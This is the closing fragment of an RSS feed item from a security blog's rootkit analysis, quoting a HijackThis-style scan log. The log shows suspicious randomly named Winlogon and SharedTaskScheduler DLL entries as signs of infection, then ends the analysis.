O9 &#8211; Extra button: Messenger &#8211; {FB5F1910-F110-11d2-BB9E-00C04F795683} &#8211; C:\Program Files\Messenger\msmsgs.exe<br />
O9 &#8211; Extra &#8216;Tools&#8217; menuitem: Windows Messenger &#8211; {FB5F1910-F110-11d2-BB9E-00C04F795683} &#8211; C:\Program Files\Messenger\msmsgs.exe<br />
O20 &#8211; Winlogon Notify: bdedabafadb &#8211; C:\WINDOWS\system32\bdedabafadb.dll<br />
O22 &#8211; SharedTaskScheduler: Browseui preloader &#8211; {438755C2-A8BA-11D1-B96B-00A0C90312E1} &#8211; C:\WINDOWS\system32\browseui.dll<br />
O22 &#8211; SharedTaskScheduler: Component Categories cache daemon &#8211; {8C7461EF-2B13-11d2-BE35-3078302C2030} &#8211; C:\WINDOWS\system32\browseui.dll<br />
O22 &#8211; SharedTaskScheduler: mcb7uehuj3n8weuhejsw &#8211; {C5BF49A2-94F3-42BD-F434-3604812C897D} &#8211; C:\WINDOWS\system32\jsne87fidgf.dll (file missing)</p>
</blockquote>
<p>End of Analysis.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2008/11/rootkitcutwaila-rootkitsiberia2-analysis/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

